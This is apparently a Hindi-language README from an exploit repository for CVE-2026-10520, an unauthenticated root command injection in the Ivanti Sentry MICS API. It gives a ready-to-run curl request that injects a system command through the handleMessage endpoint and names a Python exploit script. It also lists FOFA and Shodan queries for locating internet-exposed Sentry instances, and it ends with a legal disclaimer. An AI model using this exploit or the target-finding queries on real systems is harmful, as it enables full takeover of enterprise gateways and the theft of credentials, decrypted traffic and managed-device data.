
Ivanti Sentry में OS कमांड इंजेक्शन के माध्यम से रूट-लेवल RCE
Ivanti Sentry (पूर्व में MobileIron Sentry) एक एंटरप्राइज़ सुरक्षा गेटवे है जो मोबाइल उपकरणों और कॉर्पोरेट बैकएंड संसाधनों के बीच ट्रैफ़िक प्रॉक्सी करता है: ईमेल, SharePoint, और आंतरिक वेब अनुप्रयोग। यह मोबाइल डिवाइस प्रबंधन (MDM) नीतियों को लागू करता है, एन्क्रिप्टेड मोबाइल सत्रों को समाप्त करता है, और एंटरप्राइज़ ऐप परिनियोजन के लिए प्रमाणपत्र-आधारित प्रमाणीकरण जारी करता है। Sentry इंस्टेंस आमतौर पर पोर्ट8443 पर इंटरनेट-फेसिंग होते हैं, जो MICS (Mobile Iron Configuration Service) प्रशासन API को उजागर करते हैं।
CVE-2026-10520 एक अनप्रमाणित OS कमांड इंजेक्शन भेद्यता है
जो Ivanti Sentry R10.5.2, R10.6.2, और R10.7.1 से पहले के संस्करणों को प्रभावित करती है
(CVSSv3.1: 10 क्रिटिकल, CISA KEV में सूचीबद्ध)। दोष MICS API में है
endpoint /mics/api/v2/sentry/mics-config/handleMessage, जो URL-एन्कोडेड message
POST बॉडी के माध्यम से XML-लिपटे सिस्टम कमांड स्वीकार करता है
बिना किसी प्रमाणीकरण या इनपुट सत्यापन के। एक हमलावर जो
भेद्य endpoint तक पहुँचता है, root के रूप में मनमाना OS कमांड निष्पादित कर सकता है,
होस्ट का पूर्ण नियंत्रण प्राप्त करता है — जिसमें डिक्रिप्टेड एंटरप्राइज़ ट्रैफ़िक, संग्रहीत
क्रेडेंशियल, और सभी प्रबंधित मोबाइल-डिवाइस डेटा शामिल हैं।
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443यह रिपॉजिटरी और इसकी सामग्री केवल वैध सुरक्षा अनुसंधान, अधिकृत पैठ परीक्षण, शैक्षणिक अध्ययन, और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है। इस सामग्री तक पहुँचने या उपयोग करके, आप पूर्ण जिम्मेदारी स्वीकार करते हैं कि आपकी गतिविधियाँ सभी लागू कानूनों का पालन करती हैं और आपने किसी भी ऐसी प्रणाली का परीक्षण करने या उस पर इन तकनीकों को लागू करने से पहले उचित अधिकार प्राप्त कर लिया है जो आपकी नहीं है।
इस परियोजना के लेखक और अनुरक्षक किसी भी क्षति, कानूनी परिणाम, या इस जानकारी के उपयोग से उत्पन्न दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं। अनधिकृत पहुँच, दुर्भावनापूर्ण गतिविधि, या अवैध उद्देश्यों के लिए कोई भी उपयोग स्पष्ट रूप से निषिद्ध और असमर्थित है।
जिम्मेदारी से उपयोग करें. कानूनी रहें. केवल उसी का परीक्षण करें जिसके आप मालिक हैं या जिसके लिए आपके पास स्पष्ट लिखित अनुमति है।
SCT-PL